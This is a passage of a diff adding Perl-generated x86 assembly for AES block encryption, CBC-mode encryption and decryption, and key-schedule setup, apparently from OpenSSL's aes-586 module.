+	&mov	($_tbl,$tbl);
+	&mov	($s0,&DWP(0,$acc));		# load input data
+	&mov	($s1,&DWP(4,$acc));
+	&mov	($s2,&DWP(8,$acc));
+	&mov	($s3,&DWP(12,$acc));
+	&call	("_x86_AES_decrypt_compact");
+	&mov	("esp",$_esp);			# restore stack pointer
+	&mov	($acc,&wparam(1));		# load out
+	&mov	(&DWP(0,$acc),$s0);		# write output data
+	&mov	(&DWP(4,$acc),$s1);
+	&mov	(&DWP(8,$acc),$s2);
+	&mov	(&DWP(12,$acc),$s3);
+&function_end("AES_decrypt");
+
+# void AES_cbc_encrypt (const void char *inp, unsigned char *out,
+#			size_t length, const AES_KEY *key,
+#			unsigned char *ivp,const int enc);
+{
+# stack frame layout
+#             -4(%esp)		# return address	 0(%esp)
+#              0(%esp)		# s0 backing store	 4(%esp)	
+#              4(%esp)		# s1 backing store	 8(%esp)
+#              8(%esp)		# s2 backing store	12(%esp)
+#             12(%esp)		# s3 backing store	16(%esp)
+#             16(%esp)		# key backup		20(%esp)
+#             20(%esp)		# end of key schedule	24(%esp)
+#             24(%esp)		# %ebp backup		28(%esp)
+#             28(%esp)		# %esp backup
+my $_inp=&DWP(32,"esp");	# copy of wparam(0)
+my $_out=&DWP(36,"esp");	# copy of wparam(1)
+my $_len=&DWP(40,"esp");	# copy of wparam(2)
+my $_key=&DWP(44,"esp");	# copy of wparam(3)
+my $_ivp=&DWP(48,"esp");	# copy of wparam(4)
+my $_tmp=&DWP(52,"esp");	# volatile variable
+#
+my $ivec=&DWP(60,"esp");	# ivec[16]
+my $aes_key=&DWP(76,"esp");	# copy of aes_key
+my $mark=&DWP(76+240,"esp");	# copy of aes_key->rounds
+
+&function_begin("AES_cbc_encrypt");
+	&mov	($s2 eq "ecx"? $s2 : "",&wparam(2));	# load len
+	&cmp	($s2,0);
+	&je	(&label("drop_out"));
+
+	&call   (&label("pic_point"));		# make it PIC!
+	&set_label("pic_point");
+	&blindpop($tbl);
+	&picmeup($s0,"OPENSSL_ia32cap_P",$tbl,&label("pic_point")) if(!$x86only);
+
+	&cmp	(&wparam(5),0);
+	&lea    ($tbl,&DWP(&label("AES_Te")."-".&label("pic_point"),$tbl));
+	&jne	(&label("picked_te"));
+	&lea	($tbl,&DWP(&label("AES_Td")."-".&label("AES_Te"),$tbl));
+	&set_label("picked_te");
+
+	# one can argue if this is required
+	&pushf	();
+	&cld	();
+
+	&cmp	($s2,$speed_limit);
+	&jb	(&label("slow_way"));
+	&test	($s2,15);
+	&jnz	(&label("slow_way"));
+					if (!$x86only) {
+	&bt	(&DWP(0,$s0),28);	# check for hyper-threading bit
+	&jc	(&label("slow_way"));
+					}
+	# pre-allocate aligned stack frame...
+	&lea	($acc,&DWP(-80-244,"esp"));
+	&and	($acc,-64);
+
+	# ... and make sure it doesn't alias with $tbl modulo 4096
+	&mov	($s0,$tbl);
+	&lea	($s1,&DWP(2048+256,$tbl));
+	&mov	($s3,$acc);
+	&and	($s0,0xfff);		# s = %ebp&0xfff
+	&and	($s1,0xfff);		# e = (%ebp+2048+256)&0xfff
+	&and	($s3,0xfff);		# p = %esp&0xfff
+
+	&cmp	($s3,$s1);		# if (p>=e) %esp =- (p-e);
+	&jb	(&label("tbl_break_out"));
+	&sub	($s3,$s1);
+	&sub	($acc,$s3);
+	&jmp	(&label("tbl_ok"));
+	&set_label("tbl_break_out",4);	# else %esp -= (p-s)&0xfff + framesz;
+	&sub	($s3,$s0);
+	&and	($s3,0xfff);
+	&add	($s3,384);
+	&sub	($acc,$s3);
+	&set_label("tbl_ok",4);
+
+	&lea	($s3,&wparam(0));	# obtain pointer to parameter block
+	&exch	("esp",$acc);		# allocate stack frame
+	&add	("esp",4);		# reserve for return address!
+	&mov	($_tbl,$tbl);		# save %ebp
+	&mov	($_esp,$acc);		# save %esp
+
+	&mov	($s0,&DWP(0,$s3));	# load inp
+	&mov	($s1,&DWP(4,$s3));	# load out
+	#&mov	($s2,&DWP(8,$s3));	# load len
+	&mov	($key,&DWP(12,$s3));	# load key
+	&mov	($acc,&DWP(16,$s3));	# load ivp
+	&mov	($s3,&DWP(20,$s3));	# load enc flag
+
+	&mov	($_inp,$s0);		# save copy of inp
+	&mov	($_out,$s1);		# save copy of out
+	&mov	($_len,$s2);		# save copy of len
+	&mov	($_key,$key);		# save copy of key
+	&mov	($_ivp,$acc);		# save copy of ivp
+
+	&mov	($mark,0);		# copy of aes_key->rounds = 0;
+	# do we copy key schedule to stack?
+	&mov	($s1 eq "ebx" ? $s1 : "",$key);
+	&mov	($s2 eq "ecx" ? $s2 : "",244/4);
+	&sub	($s1,$tbl);
+	&mov	("esi",$key);
+	&and	($s1,0xfff);
+	&lea	("edi",$aes_key);
+	&cmp	($s1,2048+256);
+	&jb	(&label("do_copy"));
+	&cmp	($s1,4096-244);
+	&jb	(&label("skip_copy"));
+	&set_label("do_copy",4);
+		&mov	($_key,"edi");
+		&data_word(0xA5F3F689);	# rep movsd
+	&set_label("skip_copy");
+
+	&mov	($key,16);
+	&set_label("prefetch_tbl",4);
+		&mov	($s0,&DWP(0,$tbl));
+		&mov	($s1,&DWP(32,$tbl));
+		&mov	($s2,&DWP(64,$tbl));
+		&mov	($acc,&DWP(96,$tbl));
+		&lea	($tbl,&DWP(128,$tbl));
+		&sub	($key,1);
+	&jnz	(&label("prefetch_tbl"));
+	&sub	($tbl,2048);
+
+	&mov	($acc,$_inp);
+	&mov	($key,$_ivp);
+
+	&cmp	($s3,0);
+	&je	(&label("fast_decrypt"));
+
+#----------------------------- ENCRYPT -----------------------------#
+	&mov	($s0,&DWP(0,$key));		# load iv
+	&mov	($s1,&DWP(4,$key));
+
+	&set_label("fast_enc_loop",16);
+		&mov	($s2,&DWP(8,$key));
+		&mov	($s3,&DWP(12,$key));
+
+		&xor	($s0,&DWP(0,$acc));	# xor input data
+		&xor	($s1,&DWP(4,$acc));
+		&xor	($s2,&DWP(8,$acc));
+		&xor	($s3,&DWP(12,$acc));
+
+		&mov	($key,$_key);		# load key
+		&call	("_x86_AES_encrypt");
+
+		&mov	($acc,$_inp);		# load inp
+		&mov	($key,$_out);		# load out
+
+		&mov	(&DWP(0,$key),$s0);	# save output data
+		&mov	(&DWP(4,$key),$s1);
+		&mov	(&DWP(8,$key),$s2);
+		&mov	(&DWP(12,$key),$s3);
+
+		&lea	($acc,&DWP(16,$acc));	# advance inp
+		&mov	($s2,$_len);		# load len
+		&mov	($_inp,$acc);		# save inp
+		&lea	($s3,&DWP(16,$key));	# advance out
+		&mov	($_out,$s3);		# save out
+		&sub	($s2,16);		# decrease len
+		&mov	($_len,$s2);		# save len
+	&jnz	(&label("fast_enc_loop"));
+	&mov	($acc,$_ivp);		# load ivp
+	&mov	($s2,&DWP(8,$key));	# restore last 2 dwords
+	&mov	($s3,&DWP(12,$key));
+	&mov	(&DWP(0,$acc),$s0);	# save ivec
+	&mov	(&DWP(4,$acc),$s1);
+	&mov	(&DWP(8,$acc),$s2);
+	&mov	(&DWP(12,$acc),$s3);
+
+	&cmp	($mark,0);		# was the key schedule copied?
+	&mov	("edi",$_key);
+	&je	(&label("skip_ezero"));
+	# zero copy of key schedule
+	&mov	("ecx",240/4);
+	&xor	("eax","eax");
+	&align	(4);
+	&data_word(0xABF3F689);		# rep stosd
+	&set_label("skip_ezero");
+	&mov	("esp",$_esp);
+	&popf	();
+    &set_label("drop_out");
+	&function_end_A();
+	&pushf	();			# kludge, never executed
+
+#----------------------------- DECRYPT -----------------------------#
+&set_label("fast_decrypt",16);
+
+	&cmp	($acc,$_out);
+	&je	(&label("fast_dec_in_place"));	# in-place processing...
+
+	&mov	($_tmp,$key);
+
+	&align	(4);
+	&set_label("fast_dec_loop",16);
+		&mov	($s0,&DWP(0,$acc));	# read input
+		&mov	($s1,&DWP(4,$acc));
+		&mov	($s2,&DWP(8,$acc));
+		&mov	($s3,&DWP(12,$acc));
+
+		&mov	($key,$_key);		# load key
+		&call	("_x86_AES_decrypt");
+
+		&mov	($key,$_tmp);		# load ivp
+		&mov	($acc,$_len);		# load len
+		&xor	($s0,&DWP(0,$key));	# xor iv
+		&xor	($s1,&DWP(4,$key));
+		&xor	($s2,&DWP(8,$key));
+		&xor	($s3,&DWP(12,$key));
+
+		&mov	($key,$_out);		# load out
+		&mov	($acc,$_inp);		# load inp
+
+		&mov	(&DWP(0,$key),$s0);	# write output
+		&mov	(&DWP(4,$key),$s1);
+		&mov	(&DWP(8,$key),$s2);
+		&mov	(&DWP(12,$key),$s3);
+
+		&mov	($s2,$_len);		# load len
+		&mov	($_tmp,$acc);		# save ivp
+		&lea	($acc,&DWP(16,$acc));	# advance inp
+		&mov	($_inp,$acc);		# save inp
+		&lea	($key,&DWP(16,$key));	# advance out
+		&mov	($_out,$key);		# save out
+		&sub	($s2,16);		# decrease len
+		&mov	($_len,$s2);		# save len
+	&jnz	(&label("fast_dec_loop"));
+	&mov	($key,$_tmp);		# load temp ivp
+	&mov	($acc,$_ivp);		# load user ivp
+	&mov	($s0,&DWP(0,$key));	# load iv
+	&mov	($s1,&DWP(4,$key));
+	&mov	($s2,&DWP(8,$key));
+	&mov	($s3,&DWP(12,$key));
+	&mov	(&DWP(0,$acc),$s0);	# copy back to user
+	&mov	(&DWP(4,$acc),$s1);
+	&mov	(&DWP(8,$acc),$s2);
+	&mov	(&DWP(12,$acc),$s3);
+	&jmp	(&label("fast_dec_out"));
+
+    &set_label("fast_dec_in_place",16);
+	&set_label("fast_dec_in_place_loop");
+		&mov	($s0,&DWP(0,$acc));	# read input
+		&mov	($s1,&DWP(4,$acc));
+		&mov	($s2,&DWP(8,$acc));
+		&mov	($s3,&DWP(12,$acc));
+
+		&lea	($key,$ivec);
+		&mov	(&DWP(0,$key),$s0);	# copy to temp
+		&mov	(&DWP(4,$key),$s1);
+		&mov	(&DWP(8,$key),$s2);
+		&mov	(&DWP(12,$key),$s3);
+
+		&mov	($key,$_key);		# load key
+		&call	("_x86_AES_decrypt");
+
+		&mov	($key,$_ivp);		# load ivp
+		&mov	($acc,$_out);		# load out
+		&xor	($s0,&DWP(0,$key));	# xor iv
+		&xor	($s1,&DWP(4,$key));
+		&xor	($s2,&DWP(8,$key));
+		&xor	($s3,&DWP(12,$key));
+
+		&mov	(&DWP(0,$acc),$s0);	# write output
+		&mov	(&DWP(4,$acc),$s1);
+		&mov	(&DWP(8,$acc),$s2);
+		&mov	(&DWP(12,$acc),$s3);
+
+		&lea	($acc,&DWP(16,$acc));	# advance out
+		&mov	($_out,$acc);		# save out
+
+		&lea	($acc,$ivec);
+		&mov	($s0,&DWP(0,$acc));	# read temp
+		&mov	($s1,&DWP(4,$acc));
+		&mov	($s2,&DWP(8,$acc));
+		&mov	($s3,&DWP(12,$acc));
+
+		&mov	(&DWP(0,$key),$s0);	# copy iv
+		&mov	(&DWP(4,$key),$s1);
+		&mov	(&DWP(8,$key),$s2);
+		&mov	(&DWP(12,$key),$s3);
+
+		&mov	($acc,$_inp);		# load inp
+		&mov	($s2,$_len);		# load len
+		&lea	($acc,&DWP(16,$acc));	# advance inp
+		&mov	($_inp,$acc);		# save inp
+		&sub	($s2,16);		# decrease len
+		&mov	($_len,$s2);		# save len
+	&jnz	(&label("fast_dec_in_place_loop"));
+
+    &set_label("fast_dec_out",4);
+	&cmp	($mark,0);		# was the key schedule copied?
+	&mov	("edi",$_key);
+	&je	(&label("skip_dzero"));
+	# zero copy of key schedule
+	&mov	("ecx",240/4);
+	&xor	("eax","eax");
+	&align	(4);
+	&data_word(0xABF3F689);		# rep stosd
+	&set_label("skip_dzero");
+	&mov	("esp",$_esp);
+	&popf	();
+	&function_end_A();
+	&pushf	();			# kludge, never executed
+
+#--------------------------- SLOW ROUTINE ---------------------------#
+&set_label("slow_way",16);
+
+	&mov	($s0,&DWP(0,$s0)) if (!$x86only);# load OPENSSL_ia32cap
+	&mov	($key,&wparam(3));	# load key
+
+	# pre-allocate aligned stack frame...
+	&lea	($acc,&DWP(-80,"esp"));
+	&and	($acc,-64);
+
+	# ... and make sure it doesn't alias with $key modulo 1024
+	&lea	($s1,&DWP(-80-63,$key));
+	&sub	($s1,$acc);
+	&neg	($s1);
+	&and	($s1,0x3C0);	# modulo 1024, but aligned to cache-line
+	&sub	($acc,$s1);
+
+	# pick S-box copy which can't overlap with stack frame or $key
+	&lea	($s1,&DWP(768,$acc));
+	&sub	($s1,$tbl);
+	&and	($s1,0x300);
+	&lea	($tbl,&DWP(2048+128,$tbl,$s1));
+
+	&lea	($s3,&wparam(0));	# pointer to parameter block
+
+	&exch	("esp",$acc);
+	&add	("esp",4);		# reserve for return address!
+	&mov	($_tbl,$tbl);		# save %ebp
+	&mov	($_esp,$acc);		# save %esp
+	&mov	($_tmp,$s0);		# save OPENSSL_ia32cap
+
+	&mov	($s0,&DWP(0,$s3));	# load inp
+	&mov	($s1,&DWP(4,$s3));	# load out
+	#&mov	($s2,&DWP(8,$s3));	# load len
+	#&mov	($key,&DWP(12,$s3));	# load key
+	&mov	($acc,&DWP(16,$s3));	# load ivp
+	&mov	($s3,&DWP(20,$s3));	# load enc flag
+
+	&mov	($_inp,$s0);		# save copy of inp
+	&mov	($_out,$s1);		# save copy of out
+	&mov	($_len,$s2);		# save copy of len
+	&mov	($_key,$key);		# save copy of key
+	&mov	($_ivp,$acc);		# save copy of ivp
+
+	&mov	($key,$acc);
+	&mov	($acc,$s0);
+
+	&cmp	($s3,0);
+	&je	(&label("slow_decrypt"));
+
+#--------------------------- SLOW ENCRYPT ---------------------------#
+	&cmp	($s2,16);
+	&mov	($s3,$s1);
+	&jb	(&label("slow_enc_tail"));
+
+					if (!$x86only) {
+	&bt	($_tmp,25);		# check for SSE bit
+	&jnc	(&label("slow_enc_x86"));
+
+	&movq	("mm0",&QWP(0,$key));	# load iv
+	&movq	("mm4",&QWP(8,$key));
+
+	&set_label("slow_enc_loop_sse",16);
+		&pxor	("mm0",&QWP(0,$acc));	# xor input data
+		&pxor	("mm4",&QWP(8,$acc));
+
+		&mov	($key,$_key);
+		&call	("_sse_AES_encrypt_compact");
+
+		&mov	($acc,$_inp);		# load inp
+		&mov	($key,$_out);		# load out
+		&mov	($s2,$_len);		# load len
+
+		&movq	(&QWP(0,$key),"mm0");	# save output data
+		&movq	(&QWP(8,$key),"mm4");
+
+		&lea	($acc,&DWP(16,$acc));	# advance inp
+		&mov	($_inp,$acc);		# save inp
+		&lea	($s3,&DWP(16,$key));	# advance out
+		&mov	($_out,$s3);		# save out
+		&sub	($s2,16);		# decrease len
+		&cmp	($s2,16);
+		&mov	($_len,$s2);		# save len
+	&jae	(&label("slow_enc_loop_sse"));
+	&test	($s2,15);
+	&jnz	(&label("slow_enc_tail"));
+	&mov	($acc,$_ivp);		# load ivp
+	&movq	(&QWP(0,$acc),"mm0");	# save ivec
+	&movq	(&QWP(8,$acc),"mm4");
+	&emms	();
+	&mov	("esp",$_esp);
+	&popf	();
+	&function_end_A();
+	&pushf	();			# kludge, never executed
+					}
+    &set_label("slow_enc_x86",16);
+	&mov	($s0,&DWP(0,$key));	# load iv
+	&mov	($s1,&DWP(4,$key));
+
+	&set_label("slow_enc_loop_x86",4);
+		&mov	($s2,&DWP(8,$key));
+		&mov	($s3,&DWP(12,$key));
+
+		&xor	($s0,&DWP(0,$acc));	# xor input data
+		&xor	($s1,&DWP(4,$acc));
+		&xor	($s2,&DWP(8,$acc));
+		&xor	($s3,&DWP(12,$acc));
+
+		&mov	($key,$_key);		# load key
+		&call	("_x86_AES_encrypt_compact");
+
+		&mov	($acc,$_inp);		# load inp
+		&mov	($key,$_out);		# load out
+
+		&mov	(&DWP(0,$key),$s0);	# save output data
+		&mov	(&DWP(4,$key),$s1);
+		&mov	(&DWP(8,$key),$s2);
+		&mov	(&DWP(12,$key),$s3);
+
+		&mov	($s2,$_len);		# load len
+		&lea	($acc,&DWP(16,$acc));	# advance inp
+		&mov	($_inp,$acc);		# save inp
+		&lea	($s3,&DWP(16,$key));	# advance out
+		&mov	($_out,$s3);		# save out
+		&sub	($s2,16);		# decrease len
+		&cmp	($s2,16);
+		&mov	($_len,$s2);		# save len
+	&jae	(&label("slow_enc_loop_x86"));
+	&test	($s2,15);
+	&jnz	(&label("slow_enc_tail"));
+	&mov	($acc,$_ivp);		# load ivp
+	&mov	($s2,&DWP(8,$key));	# restore last dwords
+	&mov	($s3,&DWP(12,$key));
+	&mov	(&DWP(0,$acc),$s0);	# save ivec
+	&mov	(&DWP(4,$acc),$s1);
+	&mov	(&DWP(8,$acc),$s2);
+	&mov	(&DWP(12,$acc),$s3);
+
+	&mov	("esp",$_esp);
+	&popf	();
+	&function_end_A();
+	&pushf	();			# kludge, never executed
+
+    &set_label("slow_enc_tail",16);
+	&emms	()	if (!$x86only);
+	&mov	($key eq "edi"? $key:"",$s3);	# load out to edi
+	&mov	($s1,16);
+	&sub	($s1,$s2);
+	&cmp	($key,$acc eq "esi"? $acc:"");	# compare with inp
+	&je	(&label("enc_in_place"));
+	&align	(4);
+	&data_word(0xA4F3F689);	# rep movsb	# copy input
+	&jmp	(&label("enc_skip_in_place"));
+    &set_label("enc_in_place");
+	&lea	($key,&DWP(0,$key,$s2));
+    &set_label("enc_skip_in_place");
+	&mov	($s2,$s1);
+	&xor	($s0,$s0);
+	&align	(4);
+	&data_word(0xAAF3F689);	# rep stosb	# zero tail
+
+	&mov	($key,$_ivp);			# restore ivp
+	&mov	($acc,$s3);			# output as input
+	&mov	($s0,&DWP(0,$key));
+	&mov	($s1,&DWP(4,$key));
+	&mov	($_len,16);			# len=16
+	&jmp	(&label("slow_enc_loop_x86"));	# one more spin...
+
+#--------------------------- SLOW DECRYPT ---------------------------#
+&set_label("slow_decrypt",16);
+					if (!$x86only) {
+	&bt	($_tmp,25);		# check for SSE bit
+	&jnc	(&label("slow_dec_loop_x86"));
+
+	&set_label("slow_dec_loop_sse",4);
+		&movq	("mm0",&QWP(0,$acc));	# read input
+		&movq	("mm4",&QWP(8,$acc));
+
+		&mov	($key,$_key);
+		&call	("_sse_AES_decrypt_compact");
+
+		&mov	($acc,$_inp);		# load inp
+		&lea	($s0,$ivec);
+		&mov	($s1,$_out);		# load out
+		&mov	($s2,$_len);		# load len
+		&mov	($key,$_ivp);		# load ivp
+
+		&movq	("mm1",&QWP(0,$acc));	# re-read input
+		&movq	("mm5",&QWP(8,$acc));
+
+		&pxor	("mm0",&QWP(0,$key));	# xor iv
+		&pxor	("mm4",&QWP(8,$key));
+
+		&movq	(&QWP(0,$key),"mm1");	# copy input to iv
+		&movq	(&QWP(8,$key),"mm5");
+
+		&sub	($s2,16);		# decrease len
+		&jc	(&label("slow_dec_partial_sse"));
+
+		&movq	(&QWP(0,$s1),"mm0");	# write output
+		&movq	(&QWP(8,$s1),"mm4");
+
+		&lea	($s1,&DWP(16,$s1));	# advance out
+		&mov	($_out,$s1);		# save out
+		&lea	($acc,&DWP(16,$acc));	# advance inp
+		&mov	($_inp,$acc);		# save inp
+		&mov	($_len,$s2);		# save len
+	&jnz	(&label("slow_dec_loop_sse"));
+	&emms	();
+	&mov	("esp",$_esp);
+	&popf	();
+	&function_end_A();
+	&pushf	();			# kludge, never executed
+
+    &set_label("slow_dec_partial_sse",16);
+	&movq	(&QWP(0,$s0),"mm0");	# save output to temp
+	&movq	(&QWP(8,$s0),"mm4");
+	&emms	();
+
+	&add	($s2 eq "ecx" ? "ecx":"",16);
+	&mov	("edi",$s1);		# out
+	&mov	("esi",$s0);		# temp
+	&align	(4);
+	&data_word(0xA4F3F689);		# rep movsb # copy partial output
+
+	&mov	("esp",$_esp);
+	&popf	();
+	&function_end_A();
+	&pushf	();			# kludge, never executed
+					}
+	&set_label("slow_dec_loop_x86",16);
+		&mov	($s0,&DWP(0,$acc));	# read input
+		&mov	($s1,&DWP(4,$acc));
+		&mov	($s2,&DWP(8,$acc));
+		&mov	($s3,&DWP(12,$acc));
+
+		&lea	($key,$ivec);
+		&mov	(&DWP(0,$key),$s0);	# copy to temp
+		&mov	(&DWP(4,$key),$s1);
+		&mov	(&DWP(8,$key),$s2);
+		&mov	(&DWP(12,$key),$s3);
+
+		&mov	($key,$_key);		# load key
+		&call	("_x86_AES_decrypt_compact");
+
+		&mov	($key,$_ivp);		# load ivp
+		&mov	($acc,$_len);		# load len
+		&xor	($s0,&DWP(0,$key));	# xor iv
+		&xor	($s1,&DWP(4,$key));
+		&xor	($s2,&DWP(8,$key));
+		&xor	($s3,&DWP(12,$key));
+
+		&sub	($acc,16);
+		&jc	(&label("slow_dec_partial_x86"));
+
+		&mov	($_len,$acc);		# save len
+		&mov	($acc,$_out);		# load out
+
+		&mov	(&DWP(0,$acc),$s0);	# write output
+		&mov	(&DWP(4,$acc),$s1);
+		&mov	(&DWP(8,$acc),$s2);
+		&mov	(&DWP(12,$acc),$s3);
+
+		&lea	($acc,&DWP(16,$acc));	# advance out
+		&mov	($_out,$acc);		# save out
+
+		&lea	($acc,$ivec);
+		&mov	($s0,&DWP(0,$acc));	# read temp
+		&mov	($s1,&DWP(4,$acc));
+		&mov	($s2,&DWP(8,$acc));
+		&mov	($s3,&DWP(12,$acc));
+
+		&mov	(&DWP(0,$key),$s0);	# copy it to iv
+		&mov	(&DWP(4,$key),$s1);
+		&mov	(&DWP(8,$key),$s2);
+		&mov	(&DWP(12,$key),$s3);
+
+		&mov	($acc,$_inp);		# load inp
+		&lea	($acc,&DWP(16,$acc));	# advance inp
+		&mov	($_inp,$acc);		# save inp
+	&jnz	(&label("slow_dec_loop_x86"));
+	&mov	("esp",$_esp);
+	&popf	();
+	&function_end_A();
+	&pushf	();			# kludge, never executed
+
+    &set_label("slow_dec_partial_x86",16);
+	&lea	($acc,$ivec);
+	&mov	(&DWP(0,$acc),$s0);	# save output to temp
+	&mov	(&DWP(4,$acc),$s1);
+	&mov	(&DWP(8,$acc),$s2);
+	&mov	(&DWP(12,$acc),$s3);
+
+	&mov	($acc,$_inp);
+	&mov	($s0,&DWP(0,$acc));	# re-read input
+	&mov	($s1,&DWP(4,$acc));
+	&mov	($s2,&DWP(8,$acc));
+	&mov	($s3,&DWP(12,$acc));
+
+	&mov	(&DWP(0,$key),$s0);	# copy it to iv
+	&mov	(&DWP(4,$key),$s1);
+	&mov	(&DWP(8,$key),$s2);
+	&mov	(&DWP(12,$key),$s3);
+
+	&mov	("ecx",$_len);
+	&mov	("edi",$_out);
+	&lea	("esi",$ivec);
+	&align	(4);
+	&data_word(0xA4F3F689);		# rep movsb # copy partial output
+
+	&mov	("esp",$_esp);
+	&popf	();
+&function_end("AES_cbc_encrypt");
+}
+
+#------------------------------------------------------------------#
+
+sub enckey()
+{
+	&movz	("esi",&LB("edx"));		# rk[i]>>0
+	&movz	("ebx",&BP(-128,$tbl,"esi",1));
+	&movz	("esi",&HB("edx"));		# rk[i]>>8
+	&shl	("ebx",24);
+	&xor	("eax","ebx");
+
+	&movz	("ebx",&BP(-128,$tbl,"esi",1));
+	&shr	("edx",16);
+	&movz	("esi",&LB("edx"));		# rk[i]>>16
+	&xor	("eax","ebx");
+
+	&movz	("ebx",&BP(-128,$tbl,"esi",1));
+	&movz	("esi",&HB("edx"));		# rk[i]>>24
+	&shl	("ebx",8);
+	&xor	("eax","ebx");
+
+	&movz	("ebx",&BP(-128,$tbl,"esi",1));
+	&shl	("ebx",16);
+	&xor	("eax","ebx");
+
+	&xor	("eax",&DWP(1024-128,$tbl,"ecx",4));	# rcon
+}
+
+&function_begin("_x86_AES_set_encrypt_key");
+	&mov	("esi",&wparam(1));		# user supplied key
+	&mov	("edi",&wparam(3));		# private key schedule
+
+	&test	("esi",-1);
+	&jz	(&label("badpointer"));
+	&test	("edi",-1);
+	&jz	(&label("badpointer"));
+
+	&call	(&label("pic_point"));
+	&set_label("pic_point");
+	&blindpop($tbl);
+	&lea	($tbl,&DWP(&label("AES_Te")."-".&label("pic_point"),$tbl));
+	&lea	($tbl,&DWP(2048+128,$tbl));
+
+	# prefetch Te4
+	&mov	("eax",&DWP(0-128,$tbl));
+	&mov	("ebx",&DWP(32-128,$tbl));
+	&mov	("ecx",&DWP(64-128,$tbl));
+	&mov	("edx",&DWP(96-128,$tbl));
+	&mov	("eax",&DWP(128-128,$tbl));
+	&mov	("ebx",&DWP(160-128,$tbl));
+	&mov	("ecx",&DWP(192-128,$tbl));
+	&mov	("edx",&DWP(224-128,$tbl));
+
+	&mov	("ecx",&wparam(2));		# number of bits in key
+	&cmp	("ecx",128);
+	&je	(&label("10rounds"));
+	&cmp	("ecx",192);
+	&je	(&label("12rounds"));
+	&cmp	("ecx",256);
+	&je	(&label("14rounds"));
+	&mov	("eax",-2);			# invalid number of bits
+	&jmp	(&label("exit"));
+
+    &set_label("10rounds");
+	&mov	("eax",&DWP(0,"esi"));		# copy first 4 dwords
+	&mov	("ebx",&DWP(4,"esi"));
+	&mov	("ecx",&DWP(8,"esi"));
+	&mov	("edx",&DWP(12,"esi"));
+	&mov	(&DWP(0,"edi"),"eax");
+	&mov	(&DWP(4,"edi"),"ebx");
+	&mov	(&DWP(8,"edi"),"ecx");
+	&mov	(&DWP(12,"edi"),"edx");
+
+	&xor	("ecx","ecx");
+	&jmp	(&label("10shortcut"));
+
+	&align	(4);
+	&set_label("10loop");
+		&mov	("eax",&DWP(0,"edi"));		# rk[0]
+		&mov	("edx",&DWP(12,"edi"));		# rk[3]
+	&set_label("10shortcut");
+		&enckey	();
+
+		&mov	(&DWP(16,"edi"),"eax");		# rk[4]
+		&xor	("eax",&DWP(4,"edi"));
+		&mov	(&DWP(20,"edi"),"eax");		# rk[5]
+		&xor	("eax",&DWP(8,"edi"));
+		&mov	(&DWP(24,"edi"),"eax");		# rk[6]
+		&xor	("eax",&DWP(12,"edi"));
+		&mov	(&DWP(28,"edi"),"eax");		# rk[7]
+		&inc	("ecx");
+		&add	("edi",16);
+		&cmp	("ecx",10);
+	&jl	(&label("10loop"));
+
+	&mov	(&DWP(80,"edi"),10);		# setup number of rounds
+	&xor	("eax","eax");
+	&jmp	(&label("exit"));
+		
+    &set_label("12rounds");
+	&mov	("eax",&DWP(0,"esi"));		# copy first 6 dwords
+	&mov	("ebx",&DWP(4,"esi"));
+	&mov	("ecx",&DWP(8,"esi"));
+	&mov	("edx",&DWP(12,"esi"));
+	&mov	(&DWP(0,"edi"),"eax");
+	&mov	(&DWP(4,"edi"),"ebx");
+	&mov	(&DWP(8,"edi"),"ecx");
+	&mov	(&DWP(12,"edi"),"edx");
+	&mov	("ecx",&DWP(16,"esi"));
+	&mov	("edx",&DWP(20,"esi"));
+	&mov	(&DWP(16,"edi"),"ecx");
+	&mov	(&DWP(20,"edi"),"edx");
+
+	&xor	("ecx","ecx");
+	&jmp	(&label("12shortcut"));
+
+	&align	(4);
+	&set_label("12loop");
+		&mov	("eax",&DWP(0,"edi"));		# rk[0]
+		&mov	("edx",&DWP(20,"edi"));		# rk[5]
+	&set_label("12shortcut");
+		&enckey	();
+
+		&mov	(&DWP(24,"edi"),"eax");		# rk[6]
+		&xor	("eax",&DWP(4,"edi"));
+		&mov	(&DWP(28,"edi"),"eax");		# rk[7]
+		&xor	("eax",&DWP(8,"edi"));
+		&mov	(&DWP(32,"edi"),"eax");		# rk[8]
+		&xor	("eax",&DWP(12,"edi"));
+		&mov	(&DWP(36,"edi"),"eax");		# rk[9]
+
+		&cmp	("ecx",7);
+		&je	(&label("12break"));
+		&inc	("ecx");
+
+		&xor	("eax",&DWP(16,"edi"));
+		&mov	(&DWP(40,"edi"),"eax");		# rk[10]
+		&xor	("eax",&DWP(20,"edi"));
+		&mov	(&DWP(44,"edi"),"eax");		# rk[11]
+
+		&add	("edi",24);
+	&jmp	(&label("12loop"));
+
+	&set_label("12break");
+	&mov	(&DWP(72,"edi"),12);		# setup number of rounds
+	&xor	("eax","eax");
+	&jmp	(&label("exit"));
+
+    &set_label("14rounds");
+	&mov	("eax",&DWP(0,"esi"));		# copy first 8 dwords
+	&mov	("ebx",&DWP(4,"esi"));
+	&mov	("ecx",&DWP(8,"esi"));
+	&mov	("edx",&DWP(12,"esi"));
+	&mov	(&DWP(0,"edi"),"eax");
+	&mov	(&DWP(4,"edi"),"ebx");
+	&mov	(&DWP(8,"edi"),"ecx");
+	&mov	(&DWP(12,"edi"),"edx");
+	&mov	("eax",&DWP(16,"esi"));
+	&mov	("ebx",&DWP(20,"esi"));
+	&mov	("ecx",&DWP(24,"esi"));
+	&mov	("edx",&DWP(28,"esi"));
+	&mov	(&DWP(16,"edi"),"eax");
+	&mov	(&DWP(20,"edi"),"ebx");
+	&mov	(&DWP(24,"edi"),"ecx");
+	&mov	(&DWP(28,"edi"),"edx");
+
+	&xor	("ecx","ecx");
+	&jmp	(&label("14shortcut"));
+
+	&align	(4);
+	&set_label("14loop");
+		&mov	("edx",&DWP(28,"edi"));		# rk[7]
+	&set_label("14shortcut");
+		&mov	("eax",&DWP(0,"edi"));		# rk[0]
+
+		&enckey	();
+
+		&mov	(&DWP(32,"edi"),"eax");		# rk[8]
+		&xor	("eax",&DWP(4,"edi"));
+		&mov	(&DWP(36,"edi"),"eax");		# rk[9]
+		&xor	("eax",&DWP(8,"edi"));
+		&mov	(&DWP(40,"edi"),"eax");		# rk[10]
+		&xor	("eax",&DWP(12,"edi"));
+		&mov	(&DWP(44,"edi"),"eax");		# rk[11]
+
+		&cmp	("ecx",6);
+		&je	(&label("14break"));
+		&inc	("ecx");
+
+		&mov	("edx","eax");
+		&mov	("eax",&DWP(16,"edi"));		# rk[4]
+		&movz	("esi",&LB("edx"));		# rk[11]>>0
+		&movz	("ebx",&BP(-128,$tbl,"esi",1));
+		&movz	("esi",&HB("edx"));		# rk[11]>>8
+		&xor	("eax","ebx");
+
